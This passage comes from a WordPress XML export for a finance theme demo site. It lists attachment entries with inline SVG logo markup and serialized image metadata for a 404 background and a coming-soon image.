c-0.9,0.2-1.8,0.5-2.7,0.9c-0.5,0.2-1,0.4-1.4,0.5c-1.3,0.4-3.2,0.9-5.1,0.5c-0.7-0.2-1.3-0.4-1.9-0.8c-1.1-0.7-2-1.8-2.5-3   c-0.4-1.1-0.5-2.2-0.6-3.3c0-0.6-0.1-1.1-0.2-1.6c-0.1-0.9-0.4-1.8-0.9-2.7c-0.5-1-1-1.7-1.5-2.3C10.9,0.3,9,1,7.3,2   C7.2,2.4,7,2.7,7,3C6.7,4.8,8,6.6,9,7.8C9.1,8,9.2,8.2,9.4,8.3c1.3,1.5,2.7,3.3,3,5.5c0.3,2.3-0.6,4.3-1.4,6.2   c-0.7,1.5-1.3,2.9-1.3,4.4c0,1.7,0.9,3.5,2.5,5c0.3,0.3,0.7,0.6,1.1,0.9c0.9,0.1,1.8,0.2,2.7,0.1c0.4-0.3,0.8-0.5,1.1-0.9   c0.8-1,1-2.4,1.1-3.8c0-0.2,0-0.4,0-0.6c0.1-1.5,0.1-3,0.8-4.5c0.8-1.7,2.3-3.1,4-3.6c1.3-0.4,2.7-0.4,4.1-0.4l0.1,0   c0.7,0,1.4,0.1,2,0C29.2,16.6,29.3,16.6,29.3,16.6z"></path>
	<g>
		<path class="st0" d="M48.2,15.5v4.9h-2.4v-4.9l-3.8-7.8h2.5l2.4,5.5l2.4-5.5H52L48.2,15.5z"></path>
		<path class="st0" d="M53.5,20.1c-0.6-0.3-1-0.8-1.3-1.4c-0.3-0.6-0.5-1.3-0.5-2.1v-1.5c0-0.8,0.2-1.5,0.5-2.1    c0.3-0.6,0.8-1,1.3-1.3c0.6-0.3,1.3-0.5,2.1-0.5s1.5,0.2,2.1,0.5c0.6,0.3,1,0.8,1.3,1.3c0.3,0.6,0.5,1.3,0.5,2.1v1.5    c0,0.8-0.2,1.5-0.5,2.1c-0.3,0.6-0.8,1-1.3,1.3c-0.6,0.3-1.3,0.5-2.1,0.5S54.1,20.4,53.5,20.1z M56.8,17.8    c0.3-0.3,0.4-0.7,0.4-1.2v-1.5c0-0.5-0.1-0.9-0.4-1.2s-0.6-0.4-1.1-0.4c-0.5,0-0.9,0.1-1.1,0.4c-0.3,0.3-0.4,0.7-0.4,1.2v1.5    c0,0.5,0.1,0.9,0.4,1.2c0.3,0.3,0.6,0.4,1.1,0.4S56.5,18.1,56.8,17.8z"></path>
		<path class="st0" d="M63,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C64,20.6,63.4,20.4,63,20.1z M66.7,7.7h2.4v12.8h-2.4V7.7z"></path>
		<path class="st0" d="M72.7,20.1c-0.5-0.3-0.8-0.8-1-1.3c-0.2-0.6-0.4-1.3-0.4-2.1v-1.5c0-0.8,0.1-1.6,0.4-2.2s0.6-1.1,1-1.4    s1-0.5,1.7-0.5c0.5,0,0.9,0.1,1.3,0.4c0.4,0.3,0.7,0.7,1,1.2l-0.2,2c0-0.3-0.1-0.6-0.2-0.8s-0.3-0.4-0.5-0.5    c-0.2-0.1-0.4-0.2-0.7-0.2c-0.5,0-0.8,0.2-1.1,0.5c-0.2,0.3-0.4,0.7-0.4,1.3v1.5c0,0.5,0.1,1,0.4,1.3s0.6,0.4,1.1,0.4    c0.3,0,0.5-0.1,0.7-0.2c0.2-0.1,0.4-0.3,0.5-0.5s0.2-0.5,0.2-0.8l0.1,2.1c-0.2,0.5-0.5,0.9-0.9,1.2c-0.4,0.3-0.8,0.4-1.4,0.4    C73.7,20.6,73.1,20.4,72.7,20.1z M73.7,24.2c0,0-0.3-0.1-0.9-0.4c-0.6-0.3-1-0.6-1.3-1.1l1.6-1.5c0.2,0.2,0.5,0.4,0.7,0.5    c0.3,0.1,0.6,0.2,0.9,0.2c0.5,0,0.9-0.1,1.2-0.4c0.3-0.3,0.5-0.7,0.5-1.1v-9h2.4v8.9c0,0.8-0.2,1.6-0.5,2.2    c-0.3,0.6-0.8,1.1-1.4,1.4s-1.4,0.5-2.2,0.5C74,24.2,73.7,24.2,73.7,24.2z"></path>
		<path class="st0" d="M80,11.3h2.3l3.1,7.9l-1.5,1.9L80,11.3z M88.4,11.3l-4.1,11.3c-0.2,0.4-0.3,0.7-0.6,1    c-0.2,0.2-0.5,0.4-0.8,0.5c-0.3,0.1-0.7,0.2-1.2,0.2h-0.5v-2.3h0.5c0.3,0,0.5-0.1,0.6-0.2c0.2-0.1,0.3-0.3,0.4-0.6l3.4-9.9H88.4z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/05-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>587</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/05-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/faqs/06-2/</link>
		<pubDate>Tue, 08 Sep 2020 10:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06-1.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>588</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 10:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 10:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06-1.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06-1.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#9E9E9E;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/404-error/bg-404/</link>
		<pubDate>Wed, 09 Sep 2020 03:35:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-404.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>599</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:35:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:35:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-404]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>597</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-404.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-404.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:950;s:4:"file";s:20:"2020/09/bg-404.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg-404-1-300x148.jpg";s:5:"width";i:300;s:6:"height";i:148;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"bg-404-1-1024x507.jpg";s:5:"width";i:1024;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"bg-404-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg-404-1-768x380.jpg";s:5:"width";i:768;s:6:"height";i:380;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:21:"bg-404-1-1536x760.jpg";s:5:"width";i:1536;s:6:"height";i:760;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"bg-404-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:21:"bg-404-1-1200x950.jpg";s:5:"width";i:1200;s:6:"height";i:950;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>coming-soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/coming-soon/coming-soon-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:47:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/coming-soon.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>607</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:47:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:47:08]]></wp:post_date_gmt>
